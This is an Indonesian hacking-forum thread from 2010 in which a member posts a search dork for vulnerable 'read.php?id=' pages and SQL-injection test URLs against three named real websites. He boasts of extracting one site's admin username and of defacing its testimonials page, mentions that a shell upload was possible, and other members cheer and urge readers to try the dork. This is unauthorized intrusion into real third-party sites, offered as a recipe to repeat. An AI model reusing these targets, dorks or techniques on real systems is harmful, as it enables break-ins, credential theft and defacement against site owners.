[Bug] SQL injection pada News Read ID (read.php?)

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
User avatar
poni
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia
Contact:

[Bug] SQL injection pada News Read ID (read.php?)

Post by poni » Sun May 30, 2010 10:06 pm

Komponen yang terdapat bug sql injection = read.php
DORK: inurl:"read.php?id="

POC

Code: Select all

http://campus.sanook.com/inlove/read.php?id=132'
http://www.inspireyourworld.com/issue6/read.php?id=23'
http://www.wellerpools.com/news-read.php?id=16'
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001

User avatar
poni
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia
Contact:

Re: [Bug] SQL injection pada News Read ID (read.php?)

Post by poni » Sun May 30, 2010 10:46 pm

Image
http://www.wellerpools.com/news-read.php?id=16'

Image
Dapat deh login Admin + Pass :devil
Admin = chr1sty
Password : ************ cencored
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001

User avatar
shad.hckr
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr
Contact:

Re: [Bug] SQL injection pada News Read ID (read.php?)

Post by shad.hckr » Sun May 30, 2010 10:51 pm

waw... razia neh ceritanya ya mas pon... hehehehe... :ngakak: :ngakak: :ngakak:
but keren juga tuh CMS... :licik: :licik:

User avatar
poni
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia
Contact:

Re: [Bug] SQL injection pada News Read ID (read.php?)

Post by poni » Sun May 30, 2010 10:58 pm

Image
ada gr33tz untuk anda.. check it out

Code: Select all

http://www.wellerpools.com/testimonials.php
Btw. semua komponen bisa dimodifikasi. bahkan bisa upload shell.. tapi gue hanya sebatas edit testimonial.php saja. :P
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001

User avatar
poni
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia
Contact:

Re: [Bug] SQL injection pada News Read ID (read.php?)

Post by poni » Sun May 30, 2010 11:13 pm

shad.hckr wrote:waw... razia neh ceritanya ya mas pon... hehehehe... :ngakak: :ngakak: :ngakak:
but keren juga tuh CMS... :licik: :licik:
iya.. lagi ga ada kerjaan, masih banyak web yang vuln dengan konten tersebut. cek aja dorknya
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001

User avatar
demonbrando
Posts: 342
Joined: Thu Oct 15, 2009 12:49 am

Re: [Bug] SQL injection pada News Read ID (read.php?)

Post by demonbrando » Sun May 30, 2010 11:29 pm

wah,abang poni mantep dah... :devil tapi sayangnya passwordnya di sensor??? :putusasa:
jalani hidup ini dengan santai tapi jangan lupa ibadah..

User avatar
shad.hckr
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr
Contact:

Re: [Bug] SQL injection pada News Read ID (read.php?)

Post by shad.hckr » Sun May 30, 2010 11:36 pm

wekekeke..

Code: Select all

poni : Miss christy, we don`t do any harm on the system. Just put this message . so you may fix your web soon. thanks

Gr33tz:

   ^Family-Code^, ^rumput_kering^, 0x99/JerryMaheswara, Paman, XShadow, psychopath, fl3xu5, gblack, mas_agung, Jundi, ^_xfree_^, systemofadown, yadoy666
, Phychole, Wilmar_Kidz, 3xtr3m3b0y, Darkzzzz, Shad.hckr,  And You... the marvellous XCoders those change the Indonesian Undergorund scenes

Http://forum.xcode.or.id
keren mas.. =))

Xcode gak kalah ma agnes monica yang Go International.. :ngakak: :ngakak:

anjay
Posts: 9
Joined: Sun Sep 16, 2007 3:13 pm

Re: [Bug] SQL injection pada News Read ID (read.php?)

Post by anjay » Sun May 30, 2010 11:37 pm

mantabz om poni :love:
Diatas Langit Masih Ada Langit
Jadilah Ilmu Padi, Semakin Berisi Semakin Merunduk

User avatar
shinichi81
Posts: 137
Joined: Tue Jan 19, 2010 6:25 pm
Location: Bandung Van Java

Re: [Bug] SQL injection pada News Read ID (read.php?)

Post by shinichi81 » Mon May 31, 2010 10:16 am

upload dong bos poni POC-nya... :tapa: :tapa: :tapa: :tapa:
............make a wish............

User avatar
peniru
Posts: 389
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar
Contact:

Re: [Bug] SQL injection pada News Read ID (read.php?)

Post by peniru » Mon May 31, 2010 10:20 am

wih.. nambah lagi nih bhan belajar.... :love: :love:

tq kk poni..... :devil :devil
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]

Post Reply

Return to “Web Hacking”